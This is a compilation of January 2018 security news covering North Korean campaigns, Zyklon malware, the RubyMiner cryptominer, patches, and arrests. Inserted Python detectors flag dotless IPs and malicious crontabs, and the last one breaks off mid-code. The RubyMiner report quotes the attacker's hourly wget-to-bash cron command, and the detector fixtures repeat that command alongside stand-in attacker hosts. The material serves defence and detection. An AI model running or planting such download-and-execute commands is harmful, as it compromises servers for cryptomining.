The three campaigns leveraged a payload delivered through the Hancom Hangul Office Suite: the North Korean hackers exploited vulnerabilities such as the CVE-2013-0808 EPS viewer bug to deliver the RAT.

The attackers also used specially crafted files to trigger the arbitrary code execution vulnerability CVE-2017-0199. Group 123 also launched the FreeMilk campaign against financial institutions outside South Korea.

In this campaign the hackers used phishing messages carrying a weaponized Microsoft Office document that triggered the CVE-2017-0199 vulnerability.

“Group 123 used this vulnerability less than one month after its public disclosure. During this campaign, the attackers used 2 different malicious binaries: PoohMilk and Freenki.” continues the analysis. “PoohMilk exists only to launch Freenki. Freenki is used to gather information about the infected system and to download a subsequent stage payload. This malware was used in several campaigns in 2016 and has some code overlap with ROKRAT.”

The last campaign analyzed by the Talos group, tracked as “Are You Happy,” is a sabotage campaign that targeted victims with a ROKRAT module designed to wipe the first sectors of the victim’s hard drive.

According to Talos, this actor was very active in 2017, and likely will continue its campaigns in the next months, especially against targets in the South.

“The actor has the following demonstrated capabilities:

To include exploits (for Hangul and Microsoft Office) in its workflows.
To modify its campaigns by splitting the payload into multiple stages
To use compromised web servers or legitimate cloud based platforms.
To use HTTPS communications to make it harder to perform traffic analysis.
To compromise third parties to forge realistic spear phishing campaigns (i.e. Yonsei university in the “Golden Time” campaign).
To constantly evolve, the new fileless capability included in 2018 is a proof.” concluded Talos.

The report includes the IoCs for each campaign.


Hackers Exploiting Three Microsoft Office Flaws to Spread Zyklon Malware

18.1.2018 thehackernews Virus

Security researchers have spotted a new malware campaign in the wild that spreads an advanced botnet malware by leveraging at least three recently disclosed vulnerabilities in Microsoft Office.
Dubbed Zyklon, the fully-featured malware has resurfaced after almost two years and has primarily been found targeting telecommunications, insurance and financial services.
Active since early 2016, Zyklon is an HTTP botnet malware that communicates with its command-and-control servers over the Tor anonymising network and allows attackers to remotely steal keylogs and sensitive data, like passwords stored in web browsers and email clients.
Zyklon malware is also capable of executing additional plugins, including secretly using infected systems for DDoS attacks and cryptocurrency mining.
Different versions of the Zyklon malware have previously been found advertised on a popular underground marketplace for $75 (normal build) and $125 (Tor-enabled build).
According to a recently published report by FireEye, the attackers behind the campaign are leveraging the following three vulnerabilities in Microsoft Office to execute a PowerShell script on the targeted computers, which downloads the final payload from the C&C server.
1) .NET Framework RCE Vulnerability (CVE-2017-8759)—this remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input, allowing an attacker to take control of an affected system by tricking victims into opening a specially crafted malicious document file sent over an email. Microsoft already released a security patch for this flaw in September updates.
2) Microsoft Office RCE Vulnerability (CVE-2017-11882)—a 17-year-old memory corruption flaw, patched by Microsoft in its November update, that allows a remote attacker to execute malicious code on the targeted system without requiring any user interaction beyond opening a malicious document.
3) Dynamic Data Exchange Protocol (DDE Exploit)—this technique allows attackers to leverage a built-in feature of Microsoft Office, called DDE, to perform code execution on the targeted device without requiring Macros to be enabled or memory corruption.
As explained by the researchers, attackers are actively exploiting these three vulnerabilities to deliver Zyklon malware using spear phishing emails, which typically arrives with an attached ZIP file containing a malicious Office doc file.
Once opened, the malicious doc file equipped with one of these vulnerabilities immediately runs a PowerShell script, which eventually downloads the final payload, i.e., Zyklon HTTP malware, onto the infected computer.
"In all these techniques, the same domain is used to download the next level payload (Pause.ps1), which is another PowerShell script that is Base64 encoded," the FireEye researchers said.
"The Pause.ps1 script is responsible for resolving the APIs required for code injection. It also contains the injectable shellcode."
"The injected code is responsible for downloading the final payload from the server. The final stage payload is a PE executable compiled with .Net framework."
Interestingly, the PowerShell script connects to a dotless IP address (example: http://3627732942) to download the final payload.
What is a dotless IP address? If you are unaware, dotless IP addresses, sometimes referred to as 'decimal addresses,' are the decimal values of IPv4 addresses (which are normally represented in dotted-quad notation). Almost all modern web browsers resolve a decimal IP address to its equivalent IPv4 address when it is opened with "http://" preceding the decimal value.
For example, Google's IP address 216.58.207.206 can also be represented as http://3627732942 in decimal form.
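As an added example (not code from the FireEye report or from The Hacker News), the following Python converts between dotted-quad and decimal form and flags URLs whose host is dotless, as a detection you could run over proxy or web-filter logs; it also accepts the hexadecimal form (0xd83acfce) that browsers resolve the same way. The log lines are constructed for illustration.

```python
"""Detect and normalise 'dotless' (decimal or hex) IPv4 hosts in URLs.

Added example; not code from the FireEye report. The proxy log lines
below are constructed for illustration.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Matches http(s) URLs embedded in free text (log lines, script bodies).
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
DECIMAL_RE = re.compile(r"^[0-9]+$")
HEX_RE = re.compile(r"^0[xX][0-9a-fA-F]+$")

# Constructed sample: one decimal host, one ordinary hostname, one hex host.
SAMPLE_LOG = """\
2018-01-17T10:02:11Z proxy GET http://3627732942/Pause.ps1 client=10.0.0.5
2018-01-17T10:02:12Z proxy GET http://www.example.com/index.html client=10.0.0.6
2018-01-17T10:02:13Z proxy GET http://0xd83acfce/update.bin client=10.0.0.7
"""


def dotted_to_decimal(dotted):
    """'216.58.207.206' -> 3627732942 (the address as a big-endian 32-bit int)."""
    return int(ipaddress.IPv4Address(dotted))


def decimal_to_dotted(value):
    """3627732942 -> '216.58.207.206'; raises for values outside 32 bits."""
    return str(ipaddress.IPv4Address(value))


def normalize_host(host):
    """Return (dotted_ip, form) for a URL host.

    form is 'dotted' for a normal IPv4 literal, 'decimal' or 'hex' for the
    dotless spellings a browser silently accepts, or None for a hostname
    (or for a number too large to be an IPv4 address).
    """
    if DECIMAL_RE.match(host):
        value = int(host, 10)
        return (decimal_to_dotted(value), "decimal") if value <= 0xFFFFFFFF else (None, None)
    if HEX_RE.match(host):
        value = int(host, 16)
        return (decimal_to_dotted(value), "hex") if value <= 0xFFFFFFFF else (None, None)
    try:
        return str(ipaddress.IPv4Address(host)), "dotted"
    except ipaddress.AddressValueError:
        return None, None  # an ordinary DNS name


def find_dotless_urls(text):
    """Return (url, dotted_ip, form) for every URL in text whose host is dotless."""
    hits = []
    for url in URL_RE.findall(text):
        host = urlsplit(url).hostname or ""
        dotted, form = normalize_host(host)
        if form in ("decimal", "hex"):
            hits.append((url, dotted, form))
    return hits


if __name__ == "__main__":
    for url, dotted, form in find_dotless_urls(SAMPLE_LOG):
        print("%s host %s -> %s" % (form, url, dotted))
```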
The best way to protect yourself and your organisation from such malware attacks is always to be suspicious of any uninvited document sent via email and never to click on links inside those documents unless you have adequately verified the source.
Most importantly, always keep your software and systems up-to-date, as threat actors incorporate recently discovered, but patched, vulnerabilities in popular software—Microsoft Office, in this case—to increase the potential for successful infections.


Threat actors are delivering the Zyklon Malware exploiting three Office vulnerabilities
18.1.2018 securityaffairs 
Vulnerability

Security experts from FireEye have spotted a new strain of the Zyklon malware that has been delivered by using new vulnerabilities in Microsoft Office.
Researchers at FireEye reported the malware was used in attacks against organizations in the telecommunications, financial, and insurance sectors.

Zyklon was spotted for the first time in 2016; it is a publicly available malware that can be used for multiple purposes, such as espionage campaigns, DDoS attacks or cryptocurrency mining.

“FireEye researchers recently observed threat actors leveraging relatively new vulnerabilities in Microsoft Office to spread Zyklon HTTP malware.” reads the analysis published by FireEye.

“Zyklon is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal.”

The malware is modular: it can download several plugins to implement different features, and it may communicate with its C&C server over The Onion Router (Tor) network.

In this latest campaign, the malicious code has been delivered via spam emails as a ZIP archive that contains a specially crafted Word document.

The document exploits one of three vulnerabilities in Microsoft Office to deliver a PowerShell script that downloads the final Zyklon payload from a remote server.

Zyklon malware

One of the flaws exploited by the attackers is CVE-2017-8759, a vulnerability that was fixed by Microsoft in September 2017 after it was exploited by threat actors such as the Cobalt group to deliver malware in attacks in the wild.

A second flaw triggered by the documents used in the campaign spotted by FireEye is CVE-2017-11882, a 17-year-old vulnerability in MS Office that could be exploited by remote attackers to install malware without user interaction.
The flaw is a memory-corruption issue that affects all versions of Microsoft Office released in the past 17 years, including the latest Microsoft Office 365. The vulnerability could be triggered on all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.

The vulnerability affects the MS Office component EQNEDT32.EXE that is responsible for insertion and editing of equations (OLE objects) in documents.

This flaw was used by different APT groups, including the Cobalt group and Iran-linked hackers.

The attackers also exploited the Dynamic Data Exchange (DDE) feature in Office to deliver the malicious code, the same feature was abused by at least one Russian APT group in cyber espionage campaigns and by the powerful Necurs botnet to deliver ransomware.

Once one of these flaws has been successfully exploited, the document downloads a PowerShell script that injects code and fetches the final payload from a remote server.

FireEye highlighted the fact that attackers are exploiting recently discovered flaws in widely adopted software such as the Office suite to increase the likelihood of infecting the victims’ machines.

“Threat actors incorporating recently discovered vulnerabilities in popular software – Microsoft Office, in this case – only increases the potential for successful infections. These types of threats show why it is very important to ensure that all software is fully updated. Additionally, all industries should be on alert, as it is highly likely that the threat actors will eventually move outside the scope of their current targeting.” concludes FireEye.

Technical details about the threat, including the Indicators of Compromise, are available in the report published by FireEye.


Internet Systems Consortium rolled out a patch for a BIND security flaw that caused DNS servers to crash
18.1.2018 securityaffairs 
Vulnerability

The Internet Systems Consortium (ISC) has issued security updates for BIND to address a high severity vulnerability that could cause DNS servers to crash.
The Internet Systems Consortium (ISC) has rolled out security updates for BIND to address a high severity vulnerability that could be remotely exploited to crash DNS servers.

The flaw discovered by Jayachandran Palanisamy of Cygate AB and tracked as CVE-2017-3145, is caused by a use-after-free bug that can lead to an assertion failure and crash of the BIND name server (named) process.

“BIND was improperly sequencing cleanup operations on upstream recursion fetch contexts, leading in some cases to a use-after-free error that can trigger an assertion failure and crash in named.” reads the security advisory published by ISC.

According to the ISC there is no evidence that the flaw has been exploited in attacks in the wild, but the ISC states that many crashes caused by the bug have been reported by “multiple parties.”

The issue impacts systems that operate as DNSSEC validating resolvers; as a workaround, the experts suggest temporarily disabling DNSSEC validation.

“While this bug has existed in BIND since 9.0.0, there are no known code paths leading to it in ISC releases prior to those containing the fix for CVE-2017-3137. Thus while all instances of BIND ought to be patched, only ISC versions [9.9.9-P8 to 9.9.11, 9.10.4-P8 to 9.10.6, 9.11.0-P5 to 9.11.2, 9.9.9-S10 to 9.9.11-S1, 9.10.5-S1 to 9.10.6-S1, and 9.12.0a1 to 9.12.0rc1] acting as DNSSEC validating resolvers are currently known to crash due to this bug. The known crash is an assertion failure in netaddr.c.” continues the advisory.

The ISC also disclosed a medium severity DHCP flaw, tracked as CVE-2017-3144, that affects versions 4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, and 4.3.0 to 4.3.6.

“A vulnerability stemming from failure to properly clean up closed OMAPI connections can lead to exhaustion of the pool of socket descriptors available to the DHCP server. ” reads the ISC advisory.

“By intentionally exploiting this vulnerability an attacker who is permitted to establish connections to the OMAPI control port can exhaust the pool of socket descriptors available to the DHCP server. Once exhausted, the server will not accept additional connections, potentially denying access to legitimate connections from the server operator. While the server will continue to receive and service DHCP client requests, the operator can be blocked from the ability to use OMAPI to control server state, add new lease reservations, etc.”

ISC has already developed a patch that will be rolled out in the future DHCP releases, as a workaround it is possible to disallow access to the OMAPI control port from unauthorized clients.


Oracle January 2018 Critical Patch Update also addresses Spectre and Meltdown
18.1.2018 securityaffairs 
Vulnerability

Oracle rolled out the January 2018 Critical Patch Update, which includes 237 security fixes for its products, the majority of which are remotely exploitable without authentication.
The January 2018 Critical Patch Update also includes security updates that address Spectre and Meltdown vulnerabilities.

“The January 2018 Critical Patch Update provides fixes for certain Oracle products for the Spectre (CVE-2017-5753, CVE-2017-5715) and Meltdown (CVE-2017-5754) Intel processor vulnerabilities. Please refer to this Advisory and the Addendum to the January 2018 Critical Patch Update Advisory for Spectre and Meltdown MOS note (Doc ID 2347948.1).” reads the advisory published by Oracle. “This Critical Patch Update contains 237 new security fixes across the product families listed below. Please note that a MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at January 2018 Critical Patch Update: Executive Summary and Analysis.”

The January 2018 Critical Patch Update contains 13 new security fixes for the Oracle Sun Systems Products Suite that address 7 remotely exploitable issues.

Oracle updates include the fix for the Spectre CVE-2017-5715 vulnerability affecting its Oracle X86 Servers and Oracle VM VirtualBox. The security updates for Oracle X86 Servers include Intel microcode that allows mitigating the issue in OS and VM.

“Application of firmware patches to pick up the Intel microcode is required only for Oracle x86 servers using non Oracle OS and Virtualization software. Oracle OS and Oracle VM patches for CVE-2017-5715 will include updated Intel microcode.” reads a note included in the advisory.
The advisory includes the full list of fixes along with affected products, the product with the largest number of fixes is Financial Services Applications (34 patches, 13 of them remotely exploitable without authentication).

Second by number of fixes is Fusion Middleware, with 27 fixes (21 of them remotely exploitable without authentication).

The third is MySQL with 25 fixes, 6 of which remotely exploitable.

Let’s close with the most severe issue: the CVE-2018-2611 flaw, rated with a CVSS score of 10, affects the Sun ZFS Storage Appliance Kit (AK).


RubyMiner Monero Cryptominer affected 30% of networks worldwide in just 24h
18.1.2018 securityaffairs  Hacking

Security researchers at Check Point have spotted a malware family dubbed RubyMiner that is targeting web servers worldwide in an attempt to exploit their resources to mine Monero cryptocurrency.
RubyMiner was first spotted last week, when a massive campaign targeted web servers worldwide, most of them in the United States, Germany, the United Kingdom, Norway, and Sweden.

The experts believe that a single lone attacker is behind the attacks; in just one day he attempted to compromise nearly one-third of networks globally.

“In the last 24 hours, 30% of networks worldwide have experienced compromise attempts by a crypto-miner targeting web servers.” read the analysis from Check Point.

“During that period, the lone attacker attempted to exploit 30% of all networks worldwide to find vulnerable web servers in order to mobilize them to his mining pool. Among the top countries targeted are the United States, Germany, United Kingdom, Norway and Sweden, though no country has gone unscathed.”

RubyMiner

The malware targets both Windows and Linux servers, attempting to exploit old vulnerabilities in PHP, Microsoft IIS, and Ruby on Rails to deploy the Monero miner.

The Italian security firm Certego noticed the same attacks that began on January 10.

“Our threat intelligence platform has been logging a huge spike in ruby http exploiting since yesterday (10 January) at 23:00.” states the report published by Certego.

“The exploit has been trying to leverage a fairly old CVE (CVE-2013-0156) that allows remote code execution. The following public Emerging Threat signature covers the exploit:”

The attack doesn’t appear very sophisticated and the hacker did not attempt to conceal his operations; instead he focused on infecting the largest number of servers in the shortest time.

“Surprisingly, by using old vulnerabilities published and patched in 2012 and 2013, it doesn’t seem that stealth was part of the attacker’s agenda either. Instead, the attacker chose to exploit multiple vulnerabilities in HTTP web servers, to distribute an open source Monero miner – XMRig.” continues the analysis.

“In fact, XMRig usually sends a donation of 5% of the revenue gained from the mining process to the code’s author. However, even this amount was too much for the attacker to part with as that ‘donation element’ was deleted from the code, giving the enthusiast 100% of the profit.”

At the time of the report, only 700 servers worldwide had been successfully compromised in the first 24 hours of attacks.

The experts from Certego observed the attacker exploiting the CVE-2013-0156 remote code execution flaw in Ruby on Rails.

The attacker sends a base64 encoded payload inside a POST request in the attempt to trick the interpreter into executing it.

The malicious payload is a bash script that adds a cronjob that runs every hour and downloads a robots.txt file containing a shell script, used to fetch and execute the cryptominer. The scheduler is being told to run the whole process, including downloading the file from the server every hour.

“The cron is a UNIX based scheduler which allows running scheduled tasks at fixed times via its own syntax. Running the crontab command with the -r argument will remove all existing tasks in the existing crontab and allow for the miner to take full priority.” continues the analysis from Checkpoint.

echo "1 * * * * wget -q -O - http://internetresearch.is/robots.txt 2>/dev/null|bash >/dev/null 2>&1"|crontab -
“Now the attacker can inject the new job to the clean crontab file using the “1 * * * *” which will tell the scheduler to run once an hour for one minute infinitely.

The new job will download and execute the “robots.txt” file hosted on “internetresearch.is.” and the mining process can begin.”
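As an added example that is not Check Point's or Certego's code, the following Python audits a crontab for the persistence pattern described above: an hourly job that fetches a remote file and pipes it straight into a shell while silencing its output. The crontab text is constructed; it places the job quoted in the write-up beside a benign entry.

```python
"""Audit crontab entries for download-and-execute persistence jobs.

Added example, not code from the Check Point or Certego reports.
"""
import os
import re
import shlex

CRON_FIELDS = 5  # minute hour day-of-month month day-of-week
DOWNLOADERS = {"wget", "curl", "fetch"}
INTERPRETERS = {"sh", "bash", "dash", "zsh", "ksh", "python", "perl"}
URL_RE = re.compile(r"https?://\S+")
VAR_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")

# Constructed sample crontab: a benign renewal job plus the RubyMiner-style
# job quoted in the write-up (the domain is the one named on the page).
SAMPLE_CRONTAB = """\
MAILTO=root
# renew certificates nightly
0 3 * * * /usr/bin/certbot renew --quiet
1 * * * * wget -q -O - http://internetresearch.is/robots.txt 2>/dev/null|bash >/dev/null 2>&1
"""


def parse_crontab(text):
    """Return (schedule, command) tuples; comments and VAR=value lines are skipped."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or VAR_RE.match(line):
            continue
        n = 1 if line.startswith("@") else CRON_FIELDS  # '@hourly' style has one field
        parts = line.split(None, n)
        if len(parts) == n + 1:
            jobs.append((" ".join(parts[:n]), parts[n]))
    return jobs


def stage_programs(command):
    """First word of each '|'-separated stage, without its directory prefix."""
    programs = []
    for stage in command.split("|"):
        stage = stage.strip()
        if not stage:
            continue
        try:
            argv = shlex.split(stage)
        except ValueError:  # unbalanced quotes; fall back to a plain split
            argv = stage.split()
        if argv:
            programs.append(os.path.basename(argv[0]))
    return programs


def assess_job(schedule, command):
    """List the traits that make a job look like download-and-execute persistence."""
    findings = []
    programs = stage_programs(command)
    urls = URL_RE.findall(command)
    if urls and any(p in DOWNLOADERS for p in programs):
        findings.append("downloads from " + ", ".join(urls))
    for left, right in zip(programs, programs[1:]):
        if left in DOWNLOADERS and right in INTERPRETERS:
            findings.append("pipes %s output straight into %s (nothing lands on disk)" % (left, right))
    if not findings:
        return findings  # plain jobs are not reported on schedule or redirects alone
    if "/dev/null" in command:
        findings.append("silences its own output and errors")
    fields = schedule.split()
    if len(fields) == CRON_FIELDS and fields[1:] == ["*"] * 4:
        findings.append("runs every hour at minute " + fields[0])
    return findings


def audit_crontab(text):
    """Map each suspicious command to its findings; benign jobs are omitted."""
    report = {}
    for schedule, command in parse_crontab(text):
        findings = assess_job(schedule, command)
        if findings:
            report[command] = findings
    return report


if __name__ == "__main__":
    for command, findings in audit_crontab(SAMPLE_CRONTAB).items():
        print(command)
        for finding in findings:
            print("  -", finding)
```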

Experts believe that the robots.txt file could also be used as a kill switch for RubyMiner: by modifying the robots.txt file on the compromised web server it is possible to deactivate the malware.

“Within a minute, all the machines re-downloading the file will be receiving files without the crypto miners,” Check Point notes.

The expert noticed that one of the domains used by the attacker, lochjol.com, was involved in an attack that abused the Ruby on Rails vulnerability in 2013.

Check Point researchers also published the IoC related to RubyMiner.


KillaMuvz, the creator of the Cryptex tool family pleads guilty to running malware services
18.1.2018 securityaffairs
Virus

The Briton Goncalo Esteves (24), also known as KillaMuvz, has pleaded guilty to charges related to creating and running malware services.
The Briton Goncalo Esteves (24) has pleaded guilty to charges related to creating and running malware services.

Such platforms allow crooks to improve the development of their malicious code: malware created with Esteves’ services would not be detected by antivirus software.

Esteves, who used the moniker ‘KillaMuvz’, is the creator of the Cryptex tool, commonly used by vxers to encrypt their files in an effort to avoid detection. The first version of Cryptex was released in October 2011 and was continuously improved.

According to the NCA, Esteves has pleaded guilty to two computer misuse charges and one count of money laundering, the sentence is planned for February 12.

“A cyber criminal has admitted running a product-testing service for hackers following a joint investigation by the National Crime Agency (NCA) and cyber security firm Trend Micro.

Goncalo Esteves, 24, of Cape Close, Colchester, Essex, ran the website reFUD.me, which allowed offenders to test, for a fee, whether their malicious cyber tools could beat anti-virus scanners.” reads the announcement published by the NCA.

“Under the pseudonym KillaMuvz, he also sold custom-made malware-disguising products and offered technical support to users.

He pleaded guilty to two computer misuse offences and a count of money laundering at Blackfriars Crown Court.”

Cryptex Reborn allowed vxers to encrypt the malware files in an effort to make them “Fully UnDetectable” (FUD).

Esteves sold Crypters for use in packages which varied in price according to the length of the licence. A month of Cryptex Lite cost $7.99 (about £5 at the time of offending) while a lifetime licence for Cryptex Reborn cost $90 (about £60). The man also provided customer support via a dedicated Skype account and accepted payment either in conventional currency, in the cryptocurrency Bitcoin or in Amazon vouchers.

One of Esteves’ services was a website called reFUD.me that was launched in February 2015. It has been observed that the service was used to conduct at least 1.2 million scans.

An investigation conducted by the UK’s National Crime Agency (NCA) with the help of Trend Micro resulted in the arrest of Esteves and a woman.

Law enforcement shut down both services after the arrest; Esteves has always denied that the software was created for malicious purposes.

Esteves advertised his service on the hackforums.net website, a well-known crime messageboard.

“A free service that offers fast and reliable file scanning to ensure that your files remain fully undetectable to anti-malware software.” reads the ad.

The NCA reported that Esteves made £32,000 from more than 800 Paypal transactions between 2011 and 2015.

There is no other information about the transactions made in Bitcoin or using Amazon vouchers.


Intel Tests Performance Impact of CPU Patches on Data Centers
18.1.2018 securityweek IT
Intel Patches for Meltdown and Spectre Cause More Frequent Reboots

Intel on Wednesday shared information on the performance impact of the Meltdown and Spectre patches on data centers, and the company told customers that systems with several types of processors may experience more frequent reboots after firmware updates are installed.

Performance impact on data centers

Roughly one week ago, Intel informed customers that the mitigations for the recently disclosed CPU flaws should have a negligible performance impact for operations typically conducted on home and business PCs. The company reported seeing performance penalties ranging from 2-14% on these types of systems.

Intel has also conducted some performance tests on data centers and the initial results show that, as expected, impact depends on the type of workload and the configuration of the system.

Tests conducted on Intel Xeon Scalable (Skylake) systems showed that impact on integer and floating point throughput, Linpack, STREAM, server-side Java, and energy efficiency, which are typical for enterprise and cloud customers, was 0-2%.

In the case of online transaction processing (OLTP), Intel saw a performance impact of roughly 4%. The company is in the process of conducting more tests and believes the results will depend on system configuration and other factors.

In the case of FlexibleIO, which simulates various I/O workloads, throughput performance decreased by 18% when the CPU was stressed, but there was no impact when CPU usage was low.

Intel saw the most significant performance penalties during Storage Performance Development Kit (SPDK) tests, specifically using iSCSI, reaching 25% when only a single core was used. However, there was no impact on performance when SPDK vHost was used.

Performance penalties of Intel patches on data centers

Microsoft, AWS, Red Hat and others have also shared information on the impact of the Spectre and Meltdown mitigations on performance.


Intel has released firmware updates for 90% of the CPUs released in the last five years. While the company claims that the updates are effective at mitigating the Spectre and Meltdown attacks, users have reported seeing more frequent reboots after applying patches.

Intel initially said only systems running Broadwell and Haswell CPUs experienced more frequent reboots, but similar behavior has also been reported on Ivy Bridge-, Sandy Bridge-, Skylake-, and Kaby Lake-based platforms.

“We have reproduced these issues internally and are making progress toward identifying the root cause. In parallel, we will be providing beta microcode to vendors for validation by next week,” said Navin Shenoy, executive vice president and general manager of Intel’s Data Center Group.

Many affected vendors, including system manufacturers, have already released patches and workarounds for the Spectre and Meltdown vulnerabilities, but installing them has been known to cause serious problems.

Microsoft’s initial patches prevented systems with some AMD processors from booting, and Canonical’s Meltdown fix broke some devices running Ubuntu. Industrial control systems (ICS) vendors have warned customers that the patches for the CPU vulnerabilities should be thoroughly tested before being installed in order to prevent any disruptions.


Former CIA Agent Arrested With Top Secret Info
18.1.2018 securityweek BigBrothers

US authorities said Tuesday they had arrested a former CIA agent, Hong Kong resident Jerry Chun Shing Lee, after discovering he had an unauthorized notebook that had the identities of undercover US spies.

Lee, a naturalized US citizen also known as Zhen Cheng Li, was arrested late Monday after he arrived at JFK International Airport in New York.

The Department of Justice said Lee, 53, grew up in the United States and served in the US Army before joining the Central Intelligence Agency as a case officer in 1994.

He served in unnamed overseas locations and left the agency in 2007, later apparently taking a job in Hong Kong.

In a complaint filed in a New York federal court, the Justice Department said that in 2012, FBI agents with court-ordered warrants secretly searched Lee's luggage while he was travelling in the United States and found he was carrying top secret materials he was not authorized to have.

"Agents found two small books containing handwritten notes that contained classified information, including but not limited to, true names and phone numbers of assets and covert CIA employees, operational notes from asset meetings, operational meeting locations and locations of covert facilities," the Justice Department said.

Lee was charged with unlawful retention of national defense information, a charge that can bring up to 10 years in prison.

Officials did not say why it took so long to bring charges against Lee, or whether he had leaked any materials to foreign countries.

But the case comes amid concern in the US intelligence community that the Chinese government has been able to cripple its operations in that country.

The New York Times reported last year that from 2010 to the end of 2012, the Chinese killed "at least a dozen" sources the CIA had inside China and imprisoned six or more others.

A hunt for a "mole" in the agency led to one person, a "former operative" now living elsewhere in Asia, the Times said. But there was not enough information to arrest him.

But others in the agency blamed sloppy work and not a mole, the Times added.

Asked about the case at a regular press briefing in Beijing Wednesday, Chinese foreign ministry spokesman Lu Kang said: "I'm not aware of the information you've mentioned."


PureSec Emerges From Stealth With Security Product for Serverless Apps
18.1.2018 securityweek BigBrothers
Tel Aviv, Israel-based startup PureSec emerged from stealth mode on Wednesday with a security platform designed for serverless architectures and a guide that describes the top 10 risks for serverless applications.

Founded by Shaked Zin (CEO), Avi Shulman (VP of R&D) and Ory Segal (CTO), PureSec raised $3 million in May 2017 in a seed round led by TLV Partners.

PureSec’s product is powered by the company’s Serverless Security Runtime Environment (SSRE) technology, which provides a trusted and safe environment for serverless functions.

Applications built on serverless architectures do not require an always-on physical or virtual server. Instead, resources are provided dynamically as Backend-as-a-Service (BaaS) and Function-as-a-Service (FaaS) services. Amazon’s AWS Lambda, Microsoft’s Azure Functions, Google Cloud Functions and IBM BlueMix Cloud Functions are the most popular serverless platforms.

Using serverless architectures has many advantages, including the fact that developers can focus on product functionality without having to worry about the server side, including when it comes to applying security patches. However, the developer is still responsible for ensuring that the application is resilient to attacks.

PureSec’s product aims to address this by providing runtime protection via two layers: a firewall and a behavioral engine.

“The first layer, the Serverless Function Firewall, makes sure that input going into the function is safe for usage as event input. It can detect application layer attacks that are relevant for serverless architectures - like NoSQL Injections, SQL Injections, XSS, Local File Inclusion, Runtime Code Injections, etc. It is working on the event-data for the function (the arguments), so it is protocol agnostic and can handle any kind of event triggers (it's not limited to HTTP),” Segal told SecurityWeek.

“Once the function starts executing, our behavioral detection engine monitors ‘operations’ and ‘interactions’ performed by the function in real-time, making sure that only good behaviors are performed. Our research team spent time modeling good behavior, as well as malicious behavior, and we can detect attempts to subvert function logic, attempt to access files in an unauthorized way, attempts to download malware or execute it, or leak data. This is purely behavioral and does not rely on signatures, in order to provide 0-day protection. It's basically positive security applied to function behaviors,” he added.

PureSec’s product, currently available in pre-Beta, has already been tested by various organizations, including a very large US retail company, several global ad tech firms, and some US-based cloud technology firms. Some large US-based companies migrating systems to AWS Lambda may be signed up soon.

The company could not provide any information on pricing and general availability.

Top 10 risks for serverless applications

PureSec has also published a guide describing the top 10 risks for applications built on serverless architectures. The guide, designed for both security and development teams, provides mitigations, best practices, and comparisons to traditional applications.

Inspired by the OWASP Top 10, the document covers issues such as function event data injection, broken authentication, insecure deployment configuration, over-privileged function permissions and roles, inadequate function monitoring and logging, insecure third-party dependencies, insecure application secrets storage, denial-of-service and financial resource exhaustion, serverless function execution flow manipulation, and improper exception handling and verbose error messages.

A study conducted by the company showed that the adoption of serverless architectures has seen exponential growth, but there is a significant gap in knowledge of serverless security.


Threat Intelligence Tech Firm Anomali Raises $40 Million
18.1.2018 securityweek IT
Anomali, a security technology firm that offers a SaaS-based threat intelligence platform, today announced that it has raised $40 million in series D funding.

The additional funding brings the total amount raised to-date by the company to $96 million.

According to the company, the investment will help accelerate its growth globally and continue product development.

Formerly known as ThreatStream, the company rebranded itself as Anomali in February 2016.

Headquartered in Redwood City, Calif., the company is led by ArcSight co-founder Hugh Njemanze, who took the role as CEO in July 2014. Njemanze co-founded ArcSight in May 2000 and led product development, information technology deployment and product research leading up to HP’s acquisition of ArcSight for $1.75 billion in 2010.

The Series D round was led by Lumia Capital, with Deutsche Telekom Capital Partners (DTCP), Telstra and Sozo Ventures also participating in the round along with returning investors GV, General Catalyst, IVP and Paladin Capital Group.


Crypto-Mining Attack Targets Web Servers Globally
18.1.2018 securityweek Attack
A new malware family is targeting web servers worldwide in an attempt to ensnare them into a crypto-mining botnet, security researchers have discovered.

Dubbed RubyMiner, the threat was discovered last week, when it started launching massive attacks on web servers in the United States, Germany, United Kingdom, Norway, and Sweden. Within a single day, the attackers behind this malware attempted to compromise nearly one third of networks globally, Check Point revealed last week.

The purpose of the attack, which is targeting both Windows and Linux servers, is to install a Monero miner by exploiting old vulnerabilities that were published and patched in 2012 and 2013. The attackers weren’t looking for a stealthy compromise, but attempted to compromise a large number of vulnerable HTTP web servers as quickly as possible.

The infection campaign is targeting vulnerabilities in PHP, Microsoft IIS, and Ruby on Rails. Despite the large number of compromise attempts observed, only 700 servers worldwide have been successfully enslaved within the first 24 hours of attacks.

The attack on Ruby on Rails attempts to exploit CVE-2013-0156, a remote code execution vulnerability. A base64-encoded payload is delivered inside a POST request, expecting the Ruby interpreter on the server to execute it.

The payload is a bash script designed to add a cronjob that runs every hour and downloads a robots.txt file containing a shell script. That script fetches and executes the crypto-miner, but not before checking whether it is already active on the host. Not only the mining process, but the entire download-and-execute operation runs every hour.

“This is possibly to allow the attacker to initiate an immediate kill switch for the miner bot. If the attacker would like to end the process on the infected machines, all that needs to be done is modify the robots.txt file on the compromised webserver to be inactive. Within a minute, all the machines re-downloading the file will be receiving files without the crypto miners,” Check Point notes.
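The persistence pattern described above (an hourly cron job that fetches a robots.txt and pipes it into a shell) is something a defender can hunt for in crontabs. The following is an added example, not Check Point's code; the crontab lines and the attacker.example host are constructed for illustration.

```python
"""Flag crontab entries matching the RubyMiner persistence pattern: an hourly
job that downloads a remote file (named robots.txt in the campaign) and pipes
it straight into a shell. Added example; sample data is constructed."""
import re
from typing import Dict, List

# Constructed sample crontab mixing benign entries with two that match the
# pattern. attacker.example is a placeholder, not an indicator from any report.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
17 * * * * cd / && run-parts --report /etc/cron.hourly
0 3 * * * /usr/local/bin/backup.sh >/var/log/backup.log 2>&1
1 * * * * wget -q -O - http://attacker.example/robots.txt | bash
*/60 * * * * curl -fsSL http://attacker.example/robots.txt | sh
30 6 * * 1 /usr/bin/certbot renew --quiet
"""

DOWNLOADERS = re.compile(r"\b(curl|wget)\b")
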